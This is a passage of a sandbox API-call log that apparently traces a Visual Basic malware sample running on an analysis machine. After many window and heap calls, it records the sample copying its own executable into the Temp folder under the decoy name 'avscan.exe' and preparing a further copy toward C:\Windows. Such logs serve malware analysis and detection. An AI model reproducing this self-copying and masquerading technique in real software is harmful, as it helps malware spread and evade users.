lpMem=0x310b7e0 | out: hHeap=0x30f0000) returned 1 [0089.127] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31029b8 | out: hHeap=0x30f0000) returned 1 [0089.127] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b6e0 | out: hHeap=0x30f0000) returned 1 [0089.127] IsChild (hWndParent=0x2036e, hWnd=0x50066) returned 0 [0089.127] GetWindow (hWnd=0x2036e, uCmd=0x5) returned 0x0 [0089.127] GetFocus () returned 0x0 [0089.127] DestroyWindow (hWnd=0x2036e) returned 1 [0089.127] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0089.127] GetFocus () returned 0x0 [0089.128] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0089.128] GetFocus () returned 0x0 [0089.128] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0089.128] GetFocus () returned 0x0 [0089.128] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x3e0a07cb [0089.128] GetFocus () returned 0x0 [0089.128] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x1 [0089.129] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0089.129] GetFocus () returned 0x0 [0089.129] GetFocus () returned 0x0 [0089.129] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0089.129] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b8f0 | out: hHeap=0x30f0000) returned 1 [0089.129] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31029f8 | out: hHeap=0x30f0000) returned 1 [0089.129] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b7f0 | out: hHeap=0x30f0000) returned 1 [0089.129] IsChild (hWndParent=0x20370, hWnd=0x50066) returned 0 [0089.129] GetWindow (hWnd=0x20370, uCmd=0x5) returned 0x0 [0089.130] GetFocus () returned 0x0 [0089.130] DestroyWindow (hWnd=0x20370) returned 1 [0089.130] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0089.130] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0089.130] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0089.131] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x3e0a07cb [0089.131] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x0 [0089.131] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0089.131] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101cd8 | out: hHeap=0x30f0000) returned 1 [0089.131] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102a38 | out: hHeap=0x30f0000) returned 1 [0089.131] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b900 | out: hHeap=0x30f0000) returned 1 [0089.131] IsChild (hWndParent=0x20362, hWnd=0x50066) returned 0 [0089.131] GetWindow (hWnd=0x20362, uCmd=0x5) returned 0x0 [0089.132] GetFocus () returned 0x0 [0089.132] DestroyWindow (hWnd=0x20362) returned 1 [0089.132] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0089.132] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0089.132] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0089.133] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x3e0a07cb [0089.133] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x0 [0089.133] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0089.133] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101cf0 | out: hHeap=0x30f0000) returned 1 [0089.133] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102a78 | out: hHeap=0x30f0000) returned 1 [0089.133] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b9e8 | out: hHeap=0x30f0000) returned 1 [0089.134] IsChild (hWndParent=0x20364, hWnd=0x50066) returned 0 [0089.134] GetWindow (hWnd=0x20364, uCmd=0x5) returned 0x0 [0089.134] GetFocus () returned 0x0 [0089.134] DestroyWindow (hWnd=0x20364) returned 1 [0089.134] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0089.134] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0089.134] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0089.135] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x3e0a07cb [0089.135] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x0 [0089.135] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0089.135] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101d08 | out: hHeap=0x30f0000) returned 1 [0089.135] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102ab8 | out: hHeap=0x30f0000) returned 1 [0089.135] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bad0 | out: hHeap=0x30f0000) returned 1 [0089.135] IsChild (hWndParent=0x70062, hWnd=0x50066) returned 0 [0089.136] GetWindow (hWnd=0x70062, uCmd=0x5) returned 0x0 [0089.136] DestroyWindow (hWnd=0x70062) returned 1 [0089.136] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0089.136] SendMessageA (hWnd=0x70062, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0089.136] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0089.137] SysReAllocStringLen (in: pbstr=0x28e79c*=0x0, psz="MSVBVM60.DLL", len=0xc | out: pbstr=0x28e79c*="MSVBVM60.DLL") returned 1 [0089.137] CharLowerBuffW (in: lpsz="MSVBVM60.DLL", cchLength=0xc | out: lpsz="msvbvm60.dll") returned 0xc [0089.137] GetModuleHandleW (lpModuleName="C:\\Windows\\system32\\MSVBVM60.DLL") returned 0x72940000 [0089.138] SelectObject (hdc=0xb010b3d, h=0x18a002e) returned 0x3e0a07cb [0089.139] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0089.140] SelectObject (hdc=0xb010b3d, h=0x18a002e) returned 0x18a002e [0089.140] SelectObject (hdc=0xb010b3d, h=0x1b00016) returned 0xc300b38 [0089.140] DeleteObject (ho=0xc300b38) returned 1 [0089.140] SelectObject (hdc=0xb010b3d, h=0x1900015) returned 0x1900015 [0089.140] SelectObject (hdc=0xb010b3d, h=0x1900015) returned 0x1900015 [0089.140] ReleaseDC (hWnd=0x70062, hDC=0xb010b3d) returned 1 [0089.140] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0089.141] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b2e0 | out: hHeap=0x30f0000) returned 1 [0089.141] GetFocus () returned 0x0 [0089.141] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028b8 | out: hHeap=0x30f0000) returned 1 [0089.141] GetCurrentThreadId () returned 0xf38 [0089.141] PeekMessageA (in: lpMsg=0x28f5f8, hWnd=0x6006a, wMsgFilterMin=0x1047, wMsgFilterMax=0x1047, wRemoveMsg=0x0 | out: lpMsg=0x28f5f8) returned 0 [0089.141] PostMessageA (hWnd=0x6006a, Msg=0x1047, wParam=0x0, lParam=0x0) returned 1 [0089.142] FileSystemObject:IDispatch:Invoke (in: This=0x1072c3c, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f6c0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f908, pExcepInfo=0x28f6a0, puArgErr=0x28f6d0 | out: pDispParams=0x28f6c0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f908*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), varVal2=0x0), pExcepInfo=0x28f6a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f6d0*=0x28fb50) returned 0x0 [0089.142] VarCat (in: pvarLeft=0x28f908, pvarRight=0x28f9bc, pvarResult=0x28f8f8 | out: pvarResult=0x28f8f8) returned 0x0 [0089.142] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f48c, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0089.142] lstrcpynA (in: lpString1=0x28f378, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", iMaxLength=260 | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0089.142] lstrlenA (lpString="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 69 [0089.142] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bcd0 [0089.142] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bd20 [0089.142] lstrcpyA (in: lpString1=0x310bcd0, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0089.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop", cbMultiByte=-1, lpWideCharStr=0xe3717c, cchWideChar=27 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop") returned 27 [0089.143] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bd70 | out: hHeap=0x30f0000) returned 1 [0089.238] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f48c, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0089.238] lstrcpynA (in: lpString1=0x28f378, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", iMaxLength=260 | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0089.238] lstrlenA (lpString="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 69 [0089.238] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bcd0 [0089.238] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bd20 [0089.238] lstrcpyA (in: lpString1=0x310bcd0, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0089.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2a29d10ec3310613657d8a0dcaa4aabe.virus", cbMultiByte=-1, lpWideCharStr=0xe5863c, cchWideChar=39 | out: lpWideCharStr="2a29d10ec3310613657d8a0dcaa4aabe.virus") returned 39 [0089.238] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bd70 | out: hHeap=0x30f0000) returned 1 [0089.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", cchWideChar=-1, lpMultiByteStr=0x28f3d0, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", lpUsedDefaultChar=0x0) returned 70 [0089.239] GetFullPathNameA (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", nBufferLength=0x104, lpBuffer=0x28f500, lpFilePart=0x28f3c8 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", lpFilePart=0x28f3c8*="2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 0x45 [0089.239] CreateFileA (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f4c0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0089.240] GetFileType (hFile=0x210) returned 0x1 [0089.240] IMalloc:Alloc (This=0x76da66bc, cb=0x82) returned 0xe71588 [0089.240] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.241] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x144254c [0089.241] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.036] IMalloc:Alloc (This=0x76da66bc, cb=0x2884a84) returned 0x6f70020 [0090.039] ReadFile (in: hFile=0x210, lpBuffer=0x6f70020, nNumberOfBytesToRead=0x1442542, lpNumberOfBytesRead=0x28f560, lpOverlapped=0x0 | out: lpBuffer=0x6f70020*, lpNumberOfBytesRead=0x28f560*=0x1442542, lpOverlapped=0x0) returned 1 [0091.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MZ\x90", cbMultiByte=21243202, lpWideCharStr=0x46e0024, cchWideChar=21243202 | out: lpWideCharStr="MZ\x90") returned 21243202 [0091.216] IMalloc:Free (This=0x76da66bc, pv=0x6f70020) [0091.490] CloseHandle (hObject=0x210) returned 1 [0091.491] IMalloc:Free (This=0x76da66bc, pv=0xe71588) [0091.491] GetLocalTime (in: lpSystemTime=0x28f5dc | out: lpSystemTime=0x28f5dc*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0xe, wMilliseconds=0x2ee)) [0091.491] VarDateFromUdate (in: pudateIn=0x28f600, dwFlags=0x0, pdateOut=0x28f5dc | out: pdateOut=0x28f5dc) returned 0x0 [0091.492] SysReAllocStringLen (in: pbstr=0x28f1e0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x28f1e0*="kernel32.dll") returned 1 [0091.492] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0091.492] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a80000 [0091.734] GetProcAddress (hModule=0x75a80000, lpProcName="GetCalendarInfoW") returned 0x75aad505 [0091.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchWideChar=-1, lpMultiByteStr=0x28f3d0, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpUsedDefaultChar=0x0) returned 48 [0091.736] GetFullPathNameA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f500, lpFilePart=0x28f3c8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f3c8*="avscan.exe") returned 0x2f [0091.736] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x28f4c0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0091.738] GetFileType (hFile=0x210) returned 0x1 [0091.738] IMalloc:Alloc (This=0x76da66bc, cb=0x6c) returned 0xe4db50 [0091.738] IMalloc:Alloc (This=0x76da66bc, cb=0x2884a84) returned 0x6f70020 [0091.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MZ\x90", cchWideChar=21243202, lpMultiByteStr=0x6f70020, cbMultiByte=42486404, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MZ\x90", lpUsedDefaultChar=0x0) returned 21243202 [0092.312] WriteFile (in: hFile=0x210, lpBuffer=0x6f70020*, nNumberOfBytesToWrite=0x1442542, lpNumberOfBytesWritten=0x28f158, lpOverlapped=0x0 | out: lpBuffer=0x6f70020*, lpNumberOfBytesWritten=0x28f158*=0x1442542, lpOverlapped=0x0) returned 1 [0094.816] IMalloc:Free (This=0x76da66bc, pv=0x6f70020) [0095.183] IMalloc:Alloc (This=0x76da66bc, cb=0x2a) returned 0xe3b938 [0095.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4/27/2024 11:26:34 AM", cchWideChar=21, lpMultiByteStr=0xe3b938, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4/27/2024 11:26:34 AMData\\Local\\Temp\\avscan.exe", lpUsedDefaultChar=0x0) returned 21 [0095.183] WriteFile (in: hFile=0x210, lpBuffer=0xe3b938*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x28f158, lpOverlapped=0x0 | out: lpBuffer=0xe3b938*, lpNumberOfBytesWritten=0x28f158*=0x15, lpOverlapped=0x0) returned 1 [0095.183] IMalloc:Free (This=0x76da66bc, pv=0xe3b938) [0095.817] CloseHandle (hObject=0x210) returned 1 [0097.385] IMalloc:Free (This=0x76da66bc, pv=0xe4db50) [0098.520] FileSystemObject:IDispatch:Invoke (in: This=0x1072cec, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f6c0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f908, pExcepInfo=0x28f6a0, puArgErr=0x28f6d0 | out: pDispParams=0x28f6c0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f908*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows" (normalized: "c:\\windows"), varVal2=0x0), pExcepInfo=0x28f6a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f6d0*=0x50) returned 0x0 [0098.521] VarCat (in: pvarLeft=0x28f908, pvarRight=0x28fa14, pvarResult=0x28f8f8 | out: pvarResult=0x28f8f8) returned 0x0 [0098.521] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f48c, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0098.521] lstrcpynA (in: lpString1=0x28f378, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", iMaxLength=260 | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0098.521] lstrlenA (lpString="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 69 [0098.521] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bcd0 [0098.522] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bd20 [0098.522] lstrcpyA (in: lpString1=0x310bcd0, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0098.522] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bd20 | out: hHeap=0x30f0000) returned 1 [0098.522] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0098.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0098.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop", cbMultiByte=-1, lpWideCharStr=0xe37374, cchWideChar=27 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop") returned 27 [0098.522] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bd70 | out: hHeap=0x30f0000) returned 1 [0098.522] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f48c, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0098.522] lstrcpynA (in: lpString1=0x28f378, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", iMaxLength=260 | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0098.522] lstrlenA (lpString="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 69 [0098.522] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bcd0 [0098.522] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bd20 [0098.522] lstrcpyA (in: lpString1=0x310bcd0, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0098.522] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bd20 | out: hHeap=0x30f0000) returned 1 [0098.522] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0098.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2a29d10ec3310613657d8a0dcaa4aabe.virus", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0098.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2a29d10ec3310613657d8a0dcaa4aabe.virus", cbMultiByte=-1, lpWideCharStr=0xe5863c, cchWideChar=39 | out: lpWideCharStr="2a29d10ec3310613657d8a0dcaa4aabe.virus") returned 39 [0098.523] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bd70 | out: hHeap=0x30f0000) returned 1 [0098.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", cchWideChar=-1, lpMultiByteStr=0x28f3d0, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", lpUsedDefaultChar=0x0) returned 70 [0098.523] GetFullPathNameA (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", nBufferLength=0x104, lpBuffer=0x28f500, lpFilePart=0x28f3c8 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", lpFilePart=0x28f3c8*="2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 0x45 [0098.523] CreateFileA (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f4c0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0098.523] GetFileType (hFile=0x210) returned 0x1 [0098.523] IMalloc:Alloc (This=0x76da66bc, cb=0x82) returned 0xe71588 [0098.769] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.769] SetFilePointer (in: 